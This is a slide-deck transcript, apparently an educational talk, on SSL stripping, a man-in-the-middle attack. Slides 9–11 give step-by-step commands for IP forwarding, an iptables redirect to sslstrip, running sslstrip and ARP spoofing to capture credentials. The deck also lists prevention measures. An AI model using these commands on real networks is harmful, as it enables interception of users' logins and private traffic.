Presentation is loading. Please wait.

Presentation is loading. Please wait.

SSL Spoofing Man-In-The-Middle attack on SSL Duane Peifer.

Published by Modified over 9 years ago

Similar presentations

Presentation on theme: "SSL Spoofing Man-In-The-Middle attack on SSL Duane Peifer."— Presentation transcript:

1 SSL Spoofing Man-In-The-Middle attack on SSL Duane Peifer

2 Summary  How SSL works  Common SSL misconceptions  SSL Spoofing  Using sslstrip  Preventing SSL Spoofing  Examples of stripped sites

3 How SSL works Web Server Client PC Client hello Server hello Certificate Server hello done Client key exchange Change cipher spec Finished Change cipher spec Finished Secure connection

4 How SSL works TCP SSL HTTP TCP HTTP HTTPS

5 Common SSL misconceptions  HTTPS means I am secure right?  What about… −SSL version 2.0 flaws −Weak Ciphers < 128 bit −Certificate keys < 1024 bits −Client vulnerabilities −Server vulnerabilities −Application vulnerabilities  SSL can provide a false sense of security

6 SSL Spoofing  Moxie Marlinspike created sslstrip and presented at Black Hat DC 2009. http://www.thoughtcrime.org/  Does not attack SSL itself, but the transition from non-encrypted to encrypted communications.

7 Common HTTP/HTTPS Connection HTTP Connection on Port 80 Web Server Redirect to HTTPS Client PC HTTPS Connection on Port 443 Server Certificate Connection Established

8 Hijacking Communication Web Server Client PC HTTP request Modified HTTP Response Non-encrypted communication Attacker HTTP request Encrypted Communication Redirect to HTTPS URL

9 Using sslstrip 1.Get sslstrip A.Download and install sslstrip and arpspoof (linux only)  http://www.thoughtcrime.org/software.html http://www.thoughtcrime.org/software.html  http://sourceforge.net/projects/arpspoof/ http://sourceforge.net/projects/arpspoof/ B.Backtrack 4 (pre-installed)  http://www.backtrack-linux.org/downloads/ http://www.backtrack-linux.org/downloads/

10 Using sslstrip 2.Configure attack machine for IP forwarding. echo “1” > /proc/sys/net/ipv4/ip_forward 3.Route all HTTP traffic to sslstrip. iptables –t nat –A PREROUTING –p tcp --destination-port 80 –j REDIRECT --to-port 54321 4.Run sslstrip. sslstrip –l 54321

11 Using sslstrip 5.Configure ARP spoofing. arpspoof –i eth0 –t 6.Launch a sniffer and collect data.

12 Expanding the attack  What if a root certificate could be installed on the target?  The attacker could potentially replace the certificate and maintain a secure connection.

13 Preventing SSL Spoofing  Ensure you are using secure connections. Look for the HTTPS.  Be careful about where you use secure sites.  Secure machines on the network.  Use static ARP tables.* * This is a TON of work. Understand the ramifications of doing this before starting.

14 Secure

15 Stripped

16 Secure

17 Stripped

18 Secure

19 Stripped

20 Secure

21 Stripped

22 Secure

23 Stripped

24 Secure

25 Stripped

26 Secure

27 Stripped

28 Secure

29 Stripped

30 Summit FCU var bPasswordFocus = false;

Download ppt "SSL Spoofing Man-In-The-Middle attack on SSL Duane Peifer."

Similar presentations

Cryptography and Network Security Chapter 16

Cryptography and Network Security Chapter 16
SSLstrip Stepan Shykerynets 23.03.2013.

SSLstrip Stepan Shykerynets
SSL Protocol By Oana Dini. Overview Introduction to SSL SSL Architecture SSL Limitations.

SSL Protocol By Oana Dini. Overview Introduction to SSL SSL Architecture SSL Limitations.
Cryptography and Network Security

Cryptography and Network Security
Secure Socket Layer.

Secure Socket Layer.
SSL CS772 Fall 2011. Secure Socket layer Design Goals: SSLv2) SSL should work well with the main web protocols such as HTTP. Confidentiality is the top.

SSL CS772 Fall Secure Socket layer Design Goals: SSLv2) SSL should work well with the main web protocols such as HTTP. Confidentiality is the top.
Socket Layer Security. In this Presentation: need for web security SSL/TLS transport layer security protocols HTTPS secure shell (SSH)

Socket Layer Security. In this Presentation: need for web security SSL/TLS transport layer security protocols HTTPS secure shell (SSH)
VOYAGER: Yet Another Secure Web Browser to Demonstrate Secure Socket Layer Working and Implementation By : Shrinivas G. Deshpande Advisor: Dr. Chung E.

VOYAGER: Yet Another Secure Web Browser to Demonstrate Secure Socket Layer Working and Implementation By : Shrinivas G. Deshpande Advisor: Dr. Chung E.
Hands-On Ethical Hacking and Network Defense Lecture 15 Man in the Middle Attack to get Passwords from HTTPS Sessions.

Hands-On Ethical Hacking and Network Defense Lecture 15 Man in the Middle Attack to get Passwords from HTTPS Sessions.
More Trick For Defeating SSL

More Trick For Defeating SSL
Hacking Presented By :KUMAR ANAND SINGH 04-243,ETC/2008.

Hacking Presented By :KUMAR ANAND SINGH ,ETC/2008.
CMSC 414 Computer (and Network) Security Lecture 26 Jonathan Katz.

CMSC 414 Computer (and Network) Security Lecture 26 Jonathan Katz.
Security Awareness: Applying Practical Security in Your World, Second Edition Chapter 5 Network Security.

Security Awareness: Applying Practical Security in Your World, Second Edition Chapter 5 Network Security.
Security Awareness: Applying Practical Security in Your World

Security Awareness: Applying Practical Security in Your World
SSL By: Anthony Harris & Adam Shkoler. What is SSL? SSL stands for Secure Sockets Layer SSL is a cryptographic protocol which provides secure communications.

SSL By: Anthony Harris & Adam Shkoler. What is SSL? SSL stands for Secure Sockets Layer SSL is a cryptographic protocol which provides secure communications.
FIREWALLS & NETWORK SECURITY with Intrusion Detection and VPNs, 2 nd ed. 6 Packet Filtering By Whitman, Mattord, & Austin© 2008 Course Technology.

FIREWALLS & NETWORK SECURITY with Intrusion Detection and VPNs, 2 nd ed. 6 Packet Filtering By Whitman, Mattord, & Austin© 2008 Course Technology.
Demonstrating HTTP Session Hijacking through ARP Cache Poisoning and Man-in-the-Middle Attack and exploring HTTPS and VOIP session vulnerabilities Mainuddin.

Demonstrating HTTP Session Hijacking through ARP Cache Poisoning and Man-in-the-Middle Attack and exploring HTTPS and VOIP session vulnerabilities Mainuddin.
M2M Gateway Features Jari Lahti, CTO www.violasystems.com.

M2M Gateway Features Jari Lahti, CTO
Secure Remote Access to an Internal Web Server Christian Gilmore, David Kormann, and Aviel D. Rubin ATT Labs - Research “The security policy usually amounts.

Secure Remote Access to an Internal Web Server Christian Gilmore, David Kormann, and Aviel D. Rubin ATT Labs - Research “The security policy usually amounts.
Cs490ns-cotter1 SSH / SSL Supplementary material.

Cs490ns-cotter1 SSH / SSL Supplementary material.

Similar presentations

Ads by Google